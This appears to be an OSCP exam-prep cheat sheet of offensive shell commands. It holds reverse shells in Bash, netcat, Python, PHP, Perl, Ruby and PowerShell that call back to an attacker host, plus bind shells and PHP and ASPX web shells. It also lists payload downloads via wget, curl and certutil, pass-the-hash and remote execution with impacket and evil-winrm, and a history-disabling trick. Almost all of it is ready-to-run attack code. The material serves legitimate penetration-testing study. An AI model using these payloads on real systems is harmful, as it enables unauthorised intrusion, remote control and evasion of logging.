######################################################################
# 07 – SHELLS & STABILIZATION (OSCP 2025)
######################################################################

# NOTE: OSCP exam DOES NOT allow revshells.com, so keep offline payloads.

======================================================================
# 1. NETCAT REVERSE SHELLS
======================================================================

# Listener (Kali)
nc -lvnp 4444

# Bash reverse shell
bash -i >& /dev/tcp/$localip/4444 0>&1

# Traditional NC
nc $localip 4444 -e /bin/bash

# If -e is disabled (OSCP COMMON)
rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc $localip 4444 > /tmp/f

# BusyBox (common in OSCP)
busybox nc $localip 4444 -e /bin/sh

======================================================================
# 2. PYTHON REVERSE SHELL
======================================================================

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("$localip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

======================================================================
# 3. PHP REVERSE SHELL
======================================================================

php -r '$sock=fsockopen("'$localip'",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PHP Webshell
<?php system($_GET['cmd']); ?>

======================================================================
# 4. PERL & RUBY REVERSE SHELLS
======================================================================

# Perl
perl -e 'use Socket;$i="'$localip'";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Perl (Windows powershell)
perl -MIO::Socket::INET -e '$c=new IO::Socket::INET(PeerAddr,"'$localip':4444");STDIN->fdopen($c,r);STDOUT->fdopen($c,w);system$_ while<>;'

# Ruby
ruby -rsocket -e 'c=TCPSocket.new("'$localip'",4444);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

======================================================================
# 5. POWERSHELL (WINDOWS)
======================================================================

# Full interactive reverse shell
powershell -NoP -NonI -W Hidden -Exec Bypass -c "$client = New-Object System.Net.Sockets.TCPClient('$localip',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$i);$send=(iex $data 2>&1 | Out-String);$send2=$send+'PS > ';$stream.Write(([Text.Encoding]::ASCII).GetBytes($send2),0,$send2.Length);$stream.Flush()}"

# Short one-liner
powershell -c "$client=New-Object Net.Sockets.TCPClient('$localip',4444);$stream=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($n=$stream.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$n);$s=(iex $d 2>&1);$stream.Write(([Text.Encoding]::ASCII).GetBytes($s),0,$s.Length)}"

======================================================================
# 6. BIND SHELLS (WHEN REVERSE SHELLS FAIL)
======================================================================

# Netcat Bind Shell
nc -lvnp 4444 -e /bin/bash

# Connect from attacker:
nc $targetip 4444

# BusyBox
busybox nc -lvnp 4444 -e sh

======================================================================
# 7. TTY UPGRADE (LINUX)
======================================================================

python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then:
^Z
stty raw -echo; fg
reset

# Full stable TTY
script /dev/null -c bash

======================================================================
# 8. SOCAT FULL TTY
======================================================================

# Listener (Kali)
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Target
socat tcp:$localip:4444 exec:/bin/bash,pty,stderr,setsid,sigint,sane

======================================================================
# 9. WEB SHELLS (OSCP COMMON)
======================================================================

# PHP one-liner
<?php echo shell_exec($_GET['cmd']); ?>

# ASPX webshell (drop into IIS)
<%@ Page Language="C#" %><%Response.Write(System.IO.File.ReadAllText(Request["f"]));%>

======================================================================
# 10. FILE TRANSFER (IMPORTANT FOR OSCP)
======================================================================

# Python HTTP server
python3 -m http.server 80

# Linux download
wget http://$localip/file -O file
curl http://$localip/file -o file

# Windows download
certutil -urlcache -split -f http://$localip/file.exe file.exe

# PowerShell download
powershell -c "(New-Object Net.WebClient).DownloadFile('http://$localip/file.exe','file.exe')"

======================================================================
# 11. WINDOWS SHELLS (PSEXEC, WMI, WINRM)
======================================================================

# SYSTEM shell (pass-the-hash)
impacket-psexec $domain/$user@$targetip -hashes <LM:NTLM>

# WMI Exec
impacket-wmiexec $domain/$user:$password@$targetip

# WinRM
evil-winrm -i $targetip -u $user -p "$password"

======================================================================
# 12. STABILIZATION TRICKS
======================================================================

# Disable history logging
unset HISTFILE

# Background long processes
nohup ./script.sh &

######################################################################
# END OF 07_SHELLS_AND_STABILIZATION (COMPLETE)
######################################################################
